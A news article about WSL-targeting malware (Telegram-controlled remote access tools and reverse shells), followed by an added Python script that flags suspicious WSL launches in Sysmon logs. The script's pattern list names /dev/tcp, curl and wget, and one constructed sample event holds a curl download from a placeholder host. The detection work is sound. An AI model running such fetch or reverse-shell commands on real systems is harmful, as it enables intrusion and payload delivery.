Caution: Hackers are targeting the Windows subsystem for Linux

Written by insideindyhomes


Hackers are showing increasing interest in the Windows Subsystem for Linux (WSL) as a target. Security researchers have discovered new malware to match – some to sniff out users and steal data, others to load additional malware.

This emerges from a new report by the online magazine Bleeping Computer. The Windows Subsystem for Linux is now becoming a “popular” target for hackers, especially since WSL allows native Linux binaries to run on Windows in an environment that emulates the Linux kernel.

Recently discovered WSL-based malware samples are based on open-source code that routes communication through the messaging service Telegram and allows the threat actor remote access to the compromised system. As soon as there is access, further malware can be loaded onto the PC.

Since September 2021, the number of such attacks has been steadily increasing. One problem, however, is that they are often not recognized at all: the security researchers at Black Lotus Labs fear that there is a considerable gray area of undetected cases. Black Lotus Labs explained that they have detected more than 100 samples of WSL-based malware since last fall. Some are more advanced than others, and therefore more dangerous. Of the samples analyzed so far, two are particularly noteworthy as they can act as a remote access tool (RAT) or set up a reverse shell on the infected host.

Spy tools for login theft

Additional capabilities of the variant include taking screenshots and harvesting user and system information (username, IP address, OS version), which the attacker can use to determine which malware or utilities to use in the next phase of the compromise. The resulting multi-stage attacks often remain undetected until it is too late.

According to Black Lotus Labs, the malicious code samples used were classified as malicious by only two of the 57 antivirus programs on VirusTotal. Black Lotus Labs has warned in the past that threat actors are researching WSL for their purposes. How far this has progressed can be seen from the low detection rates of AV providers.

The general recommendation for defending against WSL-based threats is to keep a close eye on system activity, using tools like Sysmon to quickly identify suspicious activity.
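One way to act on that recommendation, as an added example that is not from the report or from Black Lotus Labs: a small triage script over exported Sysmon process-creation events (Event ID 1) that flags WSL launchers started by unusual parents or with download-style arguments. The parent list, the argument fragments and the sample events are assumptions constructed for illustration, and the script only covers the Windows-side launcher events.

```python
import ntpath
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
WSL_LAUNCHERS = {"wsl.exe", "wslhost.exe", "bash.exe"}
# Assumption: parents that rarely have a legitimate reason to start WSL.
SUSPECT_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                   "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumption: command-line fragments that deserve a second look.
SUSPECT_ARGS = ("/dev/tcp/", "curl ", "wget ")

def parse_event(xml_text):
    """Return (event_id, {field: value}) for one Sysmon event in XML form."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data

def triage(xml_events):
    """Return (UtcTime, launcher, reasons) for each suspicious WSL launch."""
    findings = []
    for xml_text in xml_events:
        event_id, d = parse_event(xml_text)
        if event_id != 1:  # only ProcessCreate events are inspected
            continue
        image = ntpath.basename(d.get("Image", "")).lower()
        if image not in WSL_LAUNCHERS:
            continue
        parent = ntpath.basename(d.get("ParentImage", "")).lower()
        cmd = d.get("CommandLine", "").lower()
        reasons = [f"parent={parent}"] if parent in SUSPECT_PARENTS else []
        reasons += [f"arg={a.strip()}" for a in SUSPECT_ARGS if a in cmd]
        if reasons:
            findings.append((d.get("UtcTime", ""), image, reasons))
    return findings

def _sample(event_id, **fields):
    """Build a constructed Sysmon-style event (test data, not a real log)."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'</System><EventData>{data}</EventData></Event>')

SAMPLE_EVENTS = [  # constructed examples
    _sample(1, UtcTime="2022-06-01 10:00:00.000", Image=r"C:\Windows\System32\wsl.exe",
            ParentImage=r"C:\Program Files\Microsoft Office\WINWORD.EXE",
            CommandLine="wsl.exe -e curl -o /tmp/x http://example.invalid/x"),
    _sample(1, UtcTime="2022-06-01 10:05:00.000", Image=r"C:\Windows\System32\wsl.exe",
            ParentImage=r"C:\Windows\explorer.exe", CommandLine="wsl.exe"),
    _sample(3, UtcTime="2022-06-01 10:06:00.000", Image=r"C:\Windows\System32\svchost.exe"),
]
```

In practice the events would come from the `Microsoft-Windows-Sysmon/Operational` log exported as XML, and the parent and argument lists need tuning against what is normal on developer machines.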
